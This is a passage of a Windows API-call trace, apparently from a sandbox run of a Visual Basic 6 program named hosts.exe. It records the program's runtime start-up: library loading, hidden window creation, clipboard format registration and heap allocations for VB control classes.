(lpString1="hosts", lpString2="INETINFO") returned -1 [0176.927] lstrcmpiA (lpString1="hosts", lpString2="W3WP") returned -1 [0176.927] lstrcmpiA (lpString1="hosts", lpString2="ASPNET_WP") returned 1 [0176.927] lstrcmpiA (lpString1="hosts", lpString2="DLLHST3G") returned 1 [0176.927] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f934, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0176.927] lstrcmpiA (lpString1="hosts", lpString2="IEXPLORE") returned -1 [0176.927] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="SXS.DLL", cbMultiByte=7, lpWideCharStr=0x28ebd0, cchWideChar=2047 | out: lpWideCharStr="SXS.DLLDLL(㱴瞩㲣瞩쒶癏(άč") returned 7 [0176.928] SysReAllocStringLen (in: pbstr=0x28fbd4*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28fbd4*="SXS.DLL") returned 1 [0176.928] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0176.928] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0176.934] GetLastError () returned 0x0 [0176.935] SetLastError (dwErrCode=0x0) [0176.935] GetLastError () returned 0x0 [0176.935] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x72f07685 [0176.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x28fe80, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0176.938] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x1c) returned 0xe52050 [0176.939] CoRegisterMessageFilter (in: lpMessageFilter=0xe52054, lplpMessageFilter=0xe5205c | out: lplpMessageFilter=0xe5205c*=0x0) returned 0x0 [0176.939] IUnknown:AddRef (This=0xe52054) returned 0x2 [0176.939] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x28fe50 | out: lpwcx=0x28fe50) returned 0 [0176.939] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x1103a1 [0176.941] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="USER32", cbMultiByte=6, lpWideCharStr=0x28ede8, cchWideChar=2047 | out: lpWideCharStr="USER32㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆쐱Ď(䘨睝쒌Ď(V") returned 6 [0176.941] SysReAllocStringLen (in: pbstr=0x28fdec*=0x0, psz="USER32", len=0x6 | out: pbstr=0x28fdec*="USER32") returned 1 [0176.942] CharLowerBuffW (in: lpsz="USER32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0176.942] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0176.942] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0176.943] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromWindow") returned 0x759a3150 [0176.943] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromRect") returned 0x759be7a0 [0176.944] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromPoint") returned 0x759a5281 [0176.944] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0176.944] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0176.944] GetSystemMetrics (nIndex=0) returned 1440 [0176.944] GetSystemMetrics (nIndex=78) returned 1440 [0176.944] GetSystemMetrics (nIndex=1) returned 900 [0176.945] GetSystemMetrics (nIndex=79) returned 900 [0176.945] GetSystemMetrics (nIndex=50) returned 16 [0176.945] GetSystemMetrics (nIndex=49) returned 16 [0176.945] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x1a019f [0176.946] RegisterClassExA (param_1=0x28fe50) returned 0x1bc1c2 [0176.946] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x403e0 [0176.947] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x81, wParam=0x0, lParam=0x28fa34) returned 0x1 [0176.958] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x83, wParam=0x0, lParam=0x28fa20) returned 0x0 [0176.959] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x1, wParam=0x0, lParam=0x28fa34) returned 0x0 [0176.959] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0176.959] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0176.959] MonitorFromWindow (hwnd=0x403e0, dwFlags=0x2) returned 0x10001 [0176.959] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x28fe58 | out: lpmi=0x28fe58) returned 1 [0176.959] SetWindowPos (hWnd=0x403e0, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0176.960] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x46, wParam=0x0, lParam=0x28fdf8) returned 0x0 [0176.961] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x47, wParam=0x0, lParam=0x28fdf8) returned 0x0 [0176.961] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0176.962] ShowWindow (hWnd=0x403e0, nCmdShow=4) returned 0 [0176.962] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0176.962] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x46, wParam=0x0, lParam=0x28fe0c) returned 0x0 [0176.963] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x47, wParam=0x0, lParam=0x28fe0c) returned 0x0 [0176.964] GetWindowThreadProcessId (in: hWnd=0x403e0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa9c [0176.964] VirtualQuery (in: lpAddress=0x28fe80, lpBuffer=0x28fe64, dwLength=0x1c | out: lpBuffer=0x28fe64*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.964] GetUserDefaultLCID () returned 0x409 [0176.964] IsValidCodePage (CodePage=0x3a4) returned 1 [0176.965] IsValidCodePage (CodePage=0x3b5) returned 1 [0176.965] IsValidCodePage (CodePage=0x3b6) returned 1 [0176.965] IsValidCodePage (CodePage=0x3a8) returned 1 [0176.978] GetUserDefaultLangID () returned 0x409 [0176.978] GetSystemDefaultLangID () returned 0x10e0409 [0176.978] GetSystemMetrics (nIndex=42) returned 0 [0176.978] IMalloc:Alloc (This=0x76da66bc, cb=0xa8) returned 0x10ebe28 [0176.978] IMalloc:GetSize (This=0x76da66bc, pv=0x10ebe28) returned 0xa8 [0176.978] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x10ee7b8 [0176.978] GetCurrentThreadId () returned 0xa9c [0176.979] IMalloc:Alloc (This=0x76da66bc, cb=0x3c) returned 0x10e6a10 [0176.979] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x10f7638 [0176.979] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fe4c | out: phkResult=0x28fe4c*=0x0) returned 0x2 [0176.979] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x10f7660 [0176.980] GetCurrentThreadId () returned 0xa9c [0176.980] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xa9c) returned 0xa039b [0176.980] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe52078 [0176.980] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x80) returned 0xe52098 [0176.980] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe52120 [0176.980] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x2c) returned 0xe52138 [0176.980] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x28fda4 | out: lpWndClass=0x28fda4) returned 0 [0176.980] RegisterClassA (lpWndClass=0x28fda4) returned 0x25c1c3 [0176.980] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x303de [0176.980] NtdllDefWindowProc_A (hWnd=0x303de, Msg=0x81, wParam=0x0, lParam=0x28f9e0) returned 0x1 [0176.981] NtdllDefWindowProc_A (hWnd=0x303de, Msg=0x83, wParam=0x0, lParam=0x28f9cc) returned 0x0 [0176.981] NtdllDefWindowProc_A (hWnd=0x303de, Msg=0x1, wParam=0x0, lParam=0x28f9e0) returned 0x0 [0176.981] NtdllDefWindowProc_A (hWnd=0x303de, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0176.981] NtdllDefWindowProc_A (hWnd=0x303de, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0176.981] SetWindowLongA (hWnd=0x303de, nIndex=0, dwNewLong=15016092) returned 0 [0176.981] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x38) returned 0xe52170 [0176.981] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x18) returned 0xe521b0 [0176.981] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe521d0 [0176.981] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0176.982] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0176.982] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0176.982] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0176.982] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0176.982] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0176.982] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0176.992] CreateCompatibleDC (hdc=0x0) returned 0x8e010bd7 [0176.992] GetCurrentObject (hdc=0x8e010bd7, type=0x7) returned 0x185000f [0176.992] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x403e0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x303e4 [0176.992] NtdllDefWindowProc_A (hWnd=0x303e4, Msg=0x81, wParam=0x0, lParam=0x28fa70) returned 0x1 [0176.993] NtdllDefWindowProc_A (hWnd=0x303e4, Msg=0x83, wParam=0x0, lParam=0x28fa5c) returned 0x0 [0176.994] NtdllDefWindowProc_A (hWnd=0x303e4, Msg=0x1, wParam=0x0, lParam=0x28fa70) returned 0x0 [0176.994] NtdllDefWindowProc_A (hWnd=0x303e4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0176.994] NtdllDefWindowProc_A (hWnd=0x303e4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0176.994] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x210, wParam=0x1, lParam=0x303e4) returned 0x0 [0176.995] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x18) returned 0xe521e8 [0176.995] RtlAllocateHeap (HeapHandle=0x3740000, Flags=0x8, Size=0x114) returned 0x37407d0 [0176.995] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x5c) returned 0xe52208 [0176.995] GetCurrentThreadId () returned 0xa9c [0176.995] GetCurrentThreadId () returned 0xa9c [0176.995] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x10) returned 0xe52270 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x30) returned 0xe52288 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x434) returned 0xe522c0 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x434) returned 0xe52700 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x3c) returned 0xe52b40 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe52b88 [0176.996] lstrlenA (lpString="VB") returned 2 [0176.996] lstrlenA (lpString="PictureBox") returned 10 [0176.996] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xe) returned 0xe52ca8 [0176.997] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x16c) returned 0xe52cc0 [0176.997] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x68) returned 0xe52e38 [0176.997] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x2c8) returned 0xe52ea8 [0176.997] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x28) returned 0xe53178 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe531a8 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x28) returned 0xe531c8 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe531f8 [0177.001] lstrlenA (lpString="VB") returned 2 [0177.001] lstrlenA (lpString="TextBox") returned 7 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe53318 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x38) returned 0xe53330 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x120) returned 0xe53370 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x60) returned 0xe53498 [0177.001] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x250) returned 0xe53500 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe53758 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe53778 [0177.002] lstrlenA (lpString="VB") returned 2 [0177.002] lstrlenA (lpString="CommandButton") returned 13 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x11) returned 0xe53898 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe538b8 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xd4) returned 0xe538e8 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x44) returned 0xe539c8 [0177.002] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1c8) returned 0xe53a18 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe53be8 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe53c08 [0177.003] lstrlenA (lpString="VB") returned 2 [0177.003] lstrlenA (lpString="Timer") returned 5 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe53d28 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xc) returned 0xe53d40 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x30) returned 0xe53d58 [0177.003] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x4) returned 0xe53d90 [0177.004] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9c) returned 0xe53da0 [0177.004] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe53e48 [0177.004] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe53e68 [0177.004] lstrlenA (lpString="VB") returned 2 [0177.004] lstrlenA (lpString="Printer") returned 7 [0177.004] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe53f88 [0177.004] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe53fa0 [0177.005] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe54088 [0177.005] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe540a8 [0177.005] lstrlenA (lpString="VB") returned 2 [0177.005] lstrlenA (lpString="Form") returned 4 [0177.005] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x8) returned 0xe541c8 [0177.005] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x184) returned 0xe541d8 [0177.005] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x7c) returned 0xe54368 [0177.006] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x2f8) returned 0xe543f0 [0177.006] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe53178, Size=0x50) returned 0xe546f0 [0177.006] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe53178 [0177.006] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe531c8, Size=0x50) returned 0xe54748 [0177.006] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe547a0 [0177.006] lstrlenA (lpString="VB") returned 2 [0177.006] lstrlenA (lpString="Screen") returned 6 [0177.006] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xa) returned 0xe531c8 [0177.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x2c) returned 0xe548c0 [0177.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xa0) returned 0xe548f8 [0177.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe549a0 [0177.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe549c0 [0177.007] lstrlenA (lpString="VB") returned 2 [0177.007] lstrlenA (lpString="Clipboard") returned 9 [0177.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xd) returned 0xe531e0 [0177.008] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x1c) returned 0xe54ae0 [0177.008] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x68) returned 0xe54b08 [0177.008] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe54b78 [0177.008] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe54b98 [0177.008] lstrlenA (lpString="VB") returned 2 [0177.008] lstrlenA (lpString="MDIForm") returned 7 [0177.008] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe54cb8 [0177.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x184) returned 0xe54cd0 [0177.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x7c) returned 0xe54e60 [0177.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x2f8) returned 0xe54ee8 [0177.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe551e8 [0177.010] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe55208 [0177.010] lstrlenA (lpString="VB") returned 2 [0177.010] lstrlenA (lpString="App") returned 3 [0177.010] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x7) returned 0xe53198 [0177.010] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x84) returned 0xe55328 [0177.010] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x148) returned 0xe553b8 [0177.010] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe55508 [0177.011] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe55528 [0177.011] lstrlenA (lpString="VB") returned 2 [0177.011] lstrlenA (lpString="UserControl") returned 11 [0177.011] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xf) returned 0xe55648 [0177.011] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x1e4) returned 0xe55660 [0177.011] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xb0) returned 0xe55850 [0177.011] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x3a4) returned 0xe55908 [0177.012] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe546f0, Size=0x78) returned 0xe55cb8 [0177.012] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe546f0 [0177.012] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe54748, Size=0x78) returned 0xe55d38 [0177.012] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe55db8 [0177.012] lstrlenA (lpString="VB") returned 2 [0177.012] lstrlenA (lpString="PropertyPage") returned 12 [0177.012] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe54710 [0177.012] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x190) returned 0xe55ed8 [0177.013] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x88) returned 0xe56070 [0177.013] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x310) returned 0xe56100 [0177.013] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0177.013] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe54728 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe56418 [0177.018] lstrlenA (lpString="VB") returned 2 [0177.018] lstrlenA (lpString="UserDocument") returned 12 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe54748 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x1c8) returned 0xe56538 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xa8) returned 0xe56708 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x370) returned 0xe567b8 [0177.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe54760 [0177.019] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x20) returned 0xe61398 [0177.020] RtlAllocateHeap (HeapHandle=0x3740000, Flags=0x8, Size=0x30) returned 0x37408f0 [0177.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xa0) returned 0xe613c0 [0177.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe61468 [0177.021] GetCurrentThreadId () returned 0xa9c [0177.021] GetCurrentThreadId () returned 0xa9c [0177.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x10) returned 0xe54780 [0177.021] RtlAllocateHeap (HeapHandle=0x3740000, Flags=0x8, Size=0x30) returned 0x3740928 [0177.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xa0) returned 0xe61498 [0177.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe61540 [0177.021] GetCurrentThreadId () returned 0xa9c [0177.022] GetCurrentThreadId () returned 0xa9c [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x10) returned 0xe61570 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe61588 [0177.022] lstrlenA (lpString="VB") returned 2 [0177.022] lstrlenA (lpString="Label") returned 5 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe616a8 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x34) returned 0xe616c0 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xf0) returned 0xe61700 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x48) returned 0xe617f8 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1f4) returned 0xe61848 [0177.022] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe61a48 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe61a68 [0177.023] lstrlenA (lpString="VB") returned 2 [0177.023] lstrlenA (lpString="Frame") returned 5 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61ba0 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x24) returned 0xe62388 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xb0) returned 0xe623b8 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x34) returned 0xe62470 [0177.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x184) returned 0xe624b0 [0177.024] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62658 [0177.024] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe62e40 [0177.024] lstrlenA (lpString="VB") returned 2 [0177.024] lstrlenA (lpString="CheckBox") returned 8 [0177.024] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xc) returned 0xe61bb8 [0177.024] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe62f60 [0177.024] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xec) returned 0xe62f90 [0177.025] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x48) returned 0xe63088 [0177.025] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1f8) returned 0xe630d8 [0177.025] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe55cb8, Size=0xa0) returned 0xe632d8 [0177.025] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62678 [0177.025] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe55d38, Size=0xa0) returned 0xe63380 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63428 [0177.026] lstrlenA (lpString="VB") returned 2 [0177.026] lstrlenA (lpString="OptionButton") returned 12 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe61bd0 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe55cb8 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xd4) returned 0xe63548 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x4c) returned 0xe55ce8 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1c8) returned 0xe63628 [0177.026] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62698 [0177.027] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63810 [0177.027] lstrlenA (lpString="VB") returned 2 [0177.027] lstrlenA (lpString="ComboBox") returned 8 [0177.027] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xc) returned 0xe61be8 [0177.027] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x108) returned 0xe657f8 [0177.027] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x4c) returned 0xe55d40 [0177.027] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x230) returned 0xe65908 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe626b8 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63938 [0177.028] lstrlenA (lpString="VB") returned 2 [0177.028] lstrlenA (lpString="ListBox") returned 7 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe61c00 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x108) returned 0xe65b40 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x54) returned 0xe65c50 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x230) returned 0xe65cb0 [0177.028] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) 